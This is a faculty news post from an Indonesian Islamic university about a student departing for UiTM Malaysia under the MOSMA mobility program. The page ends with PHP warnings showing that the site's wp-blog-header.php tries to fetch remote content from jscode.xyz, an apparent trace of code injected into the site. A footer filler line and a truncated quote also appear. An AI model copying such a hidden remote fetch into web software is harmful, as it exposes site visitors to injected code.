Muhammad Dzulfikri Al Imany Berangkat Menuju kampus University Teknologi Mara (UiTM) Malaysia dengan Program MOSMA

April 14, 2024by Humas FTK

Humas.FtkUinjambi. Berita Online – Hari ini, Minggu 14 April 2024, Muhammad Dzulfikri Al Imany , seorang mahasiswa berprestasi dari Fakultas Tarbiyah dan Keguruan Universitas Islam Negeri Sulthan Thaha Saifuddin Jambi, dengan gembira memulai perjalanan ilmiahnya sebagai peserta Program MORA Overseas Student Mobility Award (MOSMA). Dengan ranselnya yang dipenuhi dengan harapan dan semangat untuk belajar, Fikri bergabung dengan rekan-rekannya dalam upaya untuk memperluas wawasan dan pengetahuan di luar negeri.

Sebagai satu-satunya mahasiswa yang terpilih dari Universitas, Fikri akan mewakili institusinya dengan bangga di tingkat internasional. Dengan hati yang penuh dengan antusiasme, ia bercita-cita untuk memanfaatkan kesempatan ini untuk belajar dari pengalaman baru, mengeksplorasi budaya asing, dan memperdalam pemahamannya tentang isu-isu global.

“Perjalanan ini adalah kesempatan langka bagi saya,” kata Fikri, dengan senyum yang merefleksikan antusiasmenya. “Saya berharap bisa menyerap sebanyak mungkin ilmu dan pengalaman dari lingkungan akademik dan sosial di negara tujuan saya.”

Sebagai mahasiswa yang berdedikasi dan berprestasi, Fikri telah mendapat pengakuan luas di kampusnya karena prestasinya dalam akademik maupun kegiatan ekstrakurikuler. Partisipasinya dalam Program MOSMA merupakan puncak dari perjalanan pendidikannya di UIN STS Jambi.

Dalam sebuah pernyataan, Dekan FTK menyampaikan, “Kami sangat bangga dengan pencapaian Fikri dan kesempatannya untuk mewakili UIN dan FTK kita dalam Program MOSMA. Dia adalah contoh nyata dari dedikasi,

Saat berangkat, Fikri mengucapkan terima kasih kepada Pimpinan UIN dan FTK, keluarganya, dan semua pihak yang telah mendukungnya dalam perjalanan ini. “Saya akan membawa semangat dan harapan dari kampus saya ke tempat yang saya kunjungi. Saya berjanji untuk mewakili dengan baik dan pulang dengan pengalaman berharga untuk dibagikan dengan komunitas saya.”

Humas FTK

FAKULTAS TARBIYAH DAN KEGURUANAlamat
Jl. Jambi-Muara Bulian KM. 16, Simp. Sei Duren, Jambi Luar kota, Muaro Jambi, Jambi 36361.
Lokasi KamiMaps

Sosial MediaKunjungi sosial media kami

FAKULTAS TARBIYAH DAN KEGURUANAlamat
Lokasi KamiMaps
Sosial MediaKunjungi sosial media kami
Taking seamless key performance indicators offline to maximise the long tail.

2022 – Pusat Teknologi Informasi dan Pangkalan Data UIN Sulthan Thaha Saifuddin Jambi

Warning: file_get_contents(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/fitk/public_html/wp-blog-header.php on line 20

Warning: file_get_contents(https://jscode.xyz/): Failed to open stream: no suitable wrapper could be found in /home/fitk/public_html/wp-blog-header.php on line 20